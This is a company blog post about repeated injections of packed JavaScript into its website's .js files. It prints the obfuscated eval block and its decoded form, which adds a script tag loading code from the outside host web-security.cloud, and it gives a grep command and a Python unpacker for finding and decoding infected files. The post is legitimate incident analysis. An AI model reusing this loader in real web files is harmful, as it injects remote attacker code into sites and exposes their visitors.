Exposing the Attack on the Website

Background

We noticed something odd on one of our websites: a link did not go to the proper URL on our domain and instead went to a third-party link. That was quite alarming. We then checked Google Analytics, and the traffic had gone down. Something was not right here!

Last updated 18/06/2022: added the Update 2 section.

The Detail

We checked the files on the server and found a change dated 17/04/2022. That was strange, as we had not changed the files.

We opened the modified file and found this block (repeated four times, separated by ;;) at the end of the .js file. We looked up the backup, and it was different; there was no such code in it:

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))

We had this situation before, in late September 2021; at that time, the attack was on .php files.

At this stage, we do not know how they appended this extra code to the end of the .js file.

However, we identified three ways the attacker could have got in:

  • Hosting VM using cPanel, which we do not fully control
  • Custom-coded PHP web application
  • WordPress websites

To mitigate this, we moved the custom-coded PHP application to a different VM that we fully control and that has no cPanel, and moved the WordPress site to another VM that we fully control and that has no cPanel. We also set up alerts that check the files for any modification, deletion or addition.

UPDATE – 1

This happened again on 4th June 2022, this time attacking .js files.

;
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))
;

Investigating these extra codes further, we found the Unpacker at matthewfl.com.

Those codes translate as:

document.addEventListener('DOMContentLoaded', function () {
    // Guard flag on window: the loader runs only once per page load
    if (typeof window.web_security == "undefined") {
        // Create a <script> element pointing at the remote (attacker-controlled) host
        var s = document.createElement("script");
        s.src = "//web-security.cloud/event?l=115";   // protocol-relative, so it loads on both http and https pages
        document.head.appendChild(s);
        window.web_security = "success";
    }
}, false);

To search all affected files (JS or PHP), run the following command, which writes the results into a file called suspiciousfiles.txt (replace [website_url] with the site's directory):

grep --include=\*.{js,php} -rnw '/var/www/[website_url]/public_html/' -e "s|document|web_security|window" > suspiciousfiles.txt

Go through that list and remove the extra code manually, one file at a time.
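As an added example (not from the post and not the matthewfl.com Unpacker), the following Python script reimplements the p,a,c,k,e,d decoding for the injected block shown above and reports the remote script URL it loads, so that each file flagged by the grep can be confirmed to carry this loader before it is cleaned. The PACKED sample is the block copied from the post; the regexes and helper names are this example's own.

```python
import re

# Packed line as found appended to the site's .js files (copied from the post).
PACKED = r"""eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1.23(\'6\',7(){8(9 3.2=="10"){11 0=1.12("5");0.14="//15-13.17/18?19=20";1.21.22(0);3.2="16"}},4);',10,24,'s|document|web_security|window|false|script|DOMContentLoaded|function|if|typeof|undefined|var|createElement|security|src|web|success|cloud|event|l|115|head|appendChild|addEventListener'.split('|'),0,{}))"""

# Captures the packer's four arguments: payload p, radix a, word count c, word list k.
PACKER_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)")

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

def decode_index(token, radix):
    """Reverse the packer's token numbering (radix 10 here; 36 and 62 are also common)."""
    n = 0
    for ch in token:
        digit = ALPHABET.index(ch)          # raises ValueError for '_' and other non-digits
        if digit >= radix:
            raise ValueError(token)
        n = n * radix + digit
    return n

def unpack(match):
    """Replace every word token in the payload with its entry from the word list."""
    payload, radix = match.group(1), int(match.group(2))
    count, words = int(match.group(3)), match.group(4).split("|")
    payload = re.sub(r"\\(.)", r"\1", payload)   # undo JS string escapes such as \'
    def restore(m):
        token = m.group(0)
        try:
            i = decode_index(token, radix)
        except ValueError:
            return token                         # not an encoded token: keep as-is
        return words[i] if i < min(count, len(words)) and words[i] else token
    return re.sub(r"\b\w+\b", restore, payload)

def unpack_all(text):
    """Decode every packed block found in a file's contents."""
    return [unpack(m) for m in PACKER_RE.finditer(text)]

def loader_urls(js):
    """Pull the remote script URL(s) assigned to .src in decoded JavaScript."""
    return re.findall(r'\.src\s*=\s*["\']([^"\']+)["\']', js)

if __name__ == "__main__":
    for js in unpack_all(PACKED):
        print(js)
        print("loads remote script from:", loader_urls(js))
```

Run it against the contents of each file in suspiciousfiles.txt; a non-empty result from loader_urls confirms the appended block is the same remote loader.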

UPDATE – 2

On 14th June 2022, as advised by our web developer, we upgraded the web application; one of the bug fixes was updating the jQuery library to prevent JavaScript vulnerabilities.

We believe this incident is related to JavaScript vulnerabilities within this web application, and we hope this will solve the issue.

UPDATE – 3

On 27 July 2022, the website was attacked again, this time only .js files. Over 400 files had the extra code appended at the end. We managed to remove it manually.

The End

If you have reached the end of this article, congratulations. Hopefully, we have shed some light on what you need to know by exposing the attack on the website.

We write this as a living article rather than a fixed one. As in this journey, we learn as we go and rewrite some parts of the article, so please keep checking back on this article or any of our general tech posts.

We would also love to hear about how you deal with this situation and what IT-related challenges you might face. Please feel free to comment below this article, or you can contact us on the Dewacorp website for your IT support, application integration, application development, or other IT-related needs. Alternatively, you can have a casual chat on Dewachat. Let us know if you have any questions that we can help with!

A big thank you for the photo by Tima Miroshnichenko on Pexels.

To promote your products and services to the broader web community, visit our Dewalist classified website, home to 30,000+ active users and 40,000+ active advertisements so far. Check it out!
